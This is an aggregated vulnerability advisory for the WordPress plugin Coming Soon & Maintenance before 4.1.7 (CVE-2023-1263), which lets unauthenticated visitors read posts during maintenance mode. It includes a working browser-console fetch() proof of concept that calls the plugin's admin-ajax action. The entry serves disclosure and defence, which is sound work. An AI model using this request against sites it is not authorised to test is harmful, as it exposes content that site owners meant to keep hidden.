Lucene search
WpvulndbWPEX-ID:2E07FFD9-8E82-4078-96AA-162EF78C417BHistoryMar 07, 2023 - 12:00 a.m.
Coming Soon & Maintenance < 4.1.7 - Unauthenticated Post/Page Access in Maintenance Mode
2023-03-0700:00:00
wpvulndb
74
unauthenticated access
maintenance mode
developer console
web browser
command
exploit
0.003 Low
EPSS
Percentile
65.6%
The plugin does not restrict access to published and non protected posts/pages when the maintenance mode is enabled, allowing unauthenticated users to access them
Run the below command in the developer console of the web browser while being on the blog as unauthenticated, when maintenance mode is enabled
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": 'action=cmp_get_post_detail&id=42',
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));Related
wpvulndb
wpvulndb
prion
prion
Information disclosure
2023-03-07 22:15:00
nvd
nvd
CVE-2023-1263
2023-03-07 22:15:10
cvelist
cvelist
CVE-2023-1263
2023-03-07 21:07:47
cve
cve
CVE-2023-1263
2023-03-07 22:15:10
openvas
openvas
nuclei
nuclei
Coming Soon & Maintenance < 4.1.7 - Unauthenticated Post/Page Access
2023-10-17 07:20:28
wordfence
wordfence